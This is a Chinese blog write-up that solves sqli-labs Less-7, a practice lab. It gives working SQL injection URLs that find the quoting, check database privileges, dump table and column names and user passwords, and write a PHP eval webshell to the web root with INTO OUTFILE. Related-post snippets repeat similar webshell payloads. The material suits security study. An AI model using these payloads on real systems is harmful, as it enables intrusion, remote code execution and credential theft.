sqlilabs—less-7—SQL注入写webshell

已于 2022-03-15 22:14:46 修改
阅读量1.9k 收藏 4
点赞数 1
分类专栏: SQL注入 sqlilabs 文章标签: less sql mysql
于 2022-03-15 00:43:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/123492440
版权

文章目录


Less-7

image-20220314160455722

提示使用outfile函数,也就是要用SQL写webshell了

1、fuzz

测试发现是单引号闭合,并且不仅仅是单引号

image-20220314160824597

测试后发现是单引号加两个右括号

image-20220314160921142

2、order by

?id=1')) order by 3%23

3、思路一:outfile导出文件

3.1、获取数据库路径

在less7中,我们无法获取到网站路径,因为它报错不在返回报错的数据库信息,我们可以在1-6关中注入获得数据库路径

image-20220314233625312

@@datadir返回的是数据库存储数据的路径,而我们知道网站路径是在WWW目录下,那么结合@@datadir我们可以推断出网站的绝对路径为 E:\phpStudy_64\phpstudy_pro\www\

phpstudy2018和新版phpstudy的路径不太一样,可以自己下载一个做测试

3.2、读写权限测试

id=1')) and (select count(*) from mysql.user)>0 %23

返回正常则有读取权限

3.3、into outfile函数

?id=1')) union select 1,2,3 into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"

多次测试后一直写入失败,查询后得知权限过低

需要打开phpstudy\MySQL\my.ini文件,在其中加上一句:secure_file_priv="/"

image-20220315000609093

重启mysql后生效

E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt是当前关卡的路径,当然如果想直接放在WWW目录下也是一样的

image-20220315001236726

上图中显示 sql 出错了,但是没有关系,我们可以在浏览器或后台中看到 test.txt 文件已经生成了

image-20220315001310253

反斜杠“\”是Windows系统文件目录结构使用的分隔符,如:D:\我的文档。只有 windows 支持反斜杠路径符 \ ,而所有系统支持 /

但是我们还应该知道 \ 也是转义字符,在url中他会当成转义字符处理,所以我们用 \ 对反斜杠进行转义,那么结果就变成了一个反斜杠。

3.4、写一句话木马

?id=1')) union select 1,2,'<?php @eval($_POST["admin"])?>' into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.php" %23

image-20220315001546581

成功写入,当然PHP源代码是看不到的

image-20220315001646564

3.5、实用工具连接

使用中国蚁剑、中国菜刀、冰蝎等工具连接数据库即可

image-20220315001933332

image-20220315001945509

3.6、注意

对文件进行导入导出首先得要有足够的权限,
但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null)
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
2、当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
用以下命令查看secure_file_priv的值

show variables like ‘%secure%’;

image-20220315002811047

由于先前已做过修改,这里显示的是可导入导出

如果是null,想得到导入导出权限,可以在my.ini文件[mysqld]的后面加上secure_file_priv=’’(两个英文单引号),然后重启phpstudy即可

1、outfire 后面的路径为绝对路径且存在
2、要有足够的权限
3、注入的内容也可以是字符串,句子
4、要想注入新内容,需要新的文件名

这里写入文件的时候,需要注意的是利用数据库file权限向操作系统写入文件时,对于相同文件名的文件不能覆盖,所以如果第一次上传1.php,下次再上传1.php,就是无效命令了,也就是新的test.php中的内容并不会覆盖之前的1.php

4、思路二

4.1、导出数据库名

?id=-1')) union select 1,user(),database() into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt" %23

image-20220315003308307

4.2、导出表名

?id=-1')) union select 1,2,table_name from information_schema.tables where table_schema='security' into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\2.txt" %23

image-20220315003436702

4.3、导出列

?id=-1')) union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='users' into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\3.txt" %23

image-20220315003617642

4.4、导出数据

?id=-1')) union select 1,username,password from users into outfile "E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\4.txt" %23

image-20220315003726230

Shadow丶S
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1130
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
SQL注入webshell
huangyongkang666的博客
03-25 2646
SQL注入webshell 1.MySQLshell WebShell的几种方式 1、利用Union select 入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
网络安全最全网络安全-sqlmap实战之sqlilabs-Less7_sqlmap sqlilabs 7,2024年最新网络安全开发需要学什么
最新发布
2401_84545777的博客
05-15 692
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
SQL注入Webshell(Lines terminated by入)
faclon666的博客
03-31 685
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来webshell。1.当mysql注入点为盲注或报错,Union select入是不能利用的,那么可以通过分隔符入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3443
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
sql注入绕过(随时更新)
D1stiny的博客
04-03 9405
注入绕过有很多很多种,原理基本类似,在我看来有函数过滤和字符过滤两种。(因为比较菜,所以目前只讲一下字符过滤好了) 这里我选择的是根据实例进行解释(更适合小白)(会在最后进行总结,把各种方式都列出来的) 0x01(这里跟一下隔壁的风) 字符过滤,顾名思义,就是把可能在注入中出现一些字符过滤掉以此来防止注入。 那么问题来了,怎么看他是把哪种字符给过滤了呢? 在之前,我以为是通过报错才进行判断,接触...
SQLi-LABS】Less-7 Dump into Outfile解题记录
自知.的博客
08-02 619
sqli-labs的less7题题解,详述使用outfile命令导出关键信息、使用布尔脚本进行注入。步骤详尽,具有学习、参考意义。
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
主要介绍了浅谈一次与sql注入 & webshell 的美丽“邂逅”,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
JspMaster-Release-1.02_webshell管理_
09-29
webshell管理工具JspMaster,适用于管理jsp shell文件
sqlilabs靶场,课上靶场源码,sqlmap,BurpSuit,Antsword,二次注入脚本,课上用的源码
04-22
sqlilabs靶场(常用靶场),课上靶场源码(blog的源码),sqlmap(sql注入神器),BurpSuit(以后最常用的工具),Antsword(webshell的连接工具),二次注入脚本(可以修改脚本),课上用的源码
sqlilabs—less7
一个普普通通的博客
03-24 2545
sqlilabs—less7
sqli-labs buuctf平台+本地环境 全关全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1864
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 python代码来跑出内容 import requests url
[网络安全]sqli-labs Less-7 解题详析
等风来
07-23 2457
以上为[网络安全]sqli-labs Less-7 解题详析,后续将分享[网络安全]sqli-labs Less-8 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC
henghengzhao_的博客
10-18 1176
大白话讲解,通篇的是我做题的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC
sqli-lab教程 less-7,8
xiaoyuhensuai的博客
07-08 277
查找原SQL语句:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"在我们输入:?id=1时会显示“You are in.... Use outfile......”,从中发现在这一关中没有报错我们所需的内容。所有在这一关中我们要使用“布尔盲注”此时我们就需要使用“select length(database())”显示当前数据名字的长度和“select substr(database(),1,1)”显示当前熟即名字的第一个字母。对数据库长度进行推
sql注入】Less5-7详解
lyy0xfff的博客
07-13 874
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类型、时间类型的盲注 0x01 Less-6 Less-7 ...
SQLi-Labs Less7-Less10
KRDecad3的博客
11-13 617
Less-7-GET-Dump into outfile-String 考查into outfile入文件 输入id=1 输入id=1'报错 输入id=1"不报错,说明是单引号 输入id=1'--+报错,那么再试试id=1')--+还报错,再试试id=1'))--+正常,由此判断查询语句的参数是(('$_GET[id]'))的形式。 使用into outfile入一句话: 输入id=-...
sqli-labs Less-7 Dump into outfile sql注入文件
bigblue00的博客
06-16 1655
Less-7 Dump into outfile sql注入文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
sql注入less23
03-16
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。SQL注入攻击可以导致数据泄露、数据篡改、系统崩溃等严重后果。 SQL注入攻击的目标是通过构造特定的输入,使应用程序将恶意的SQL代码作为正常的查询语句或命令来执行。在less23中,它是一个用于演示SQL注入的示例网站。在该示例中,存在一个漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来绕过应用程序的验证和过滤机制,从而执行未经授权的数据库操作。 为了防止SQL注入攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句,而不是拼接字符串来构建SQL查询语句。 2. 对用户输入进行严格的验证和过滤,确保输入数据符合预期的格式和类型。 3. 最小化数据库用户的权限,避免使用具有过高权限的账户连接数据库。 4. 定期更新和维护数据库系统,确保安装最新的安全补丁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值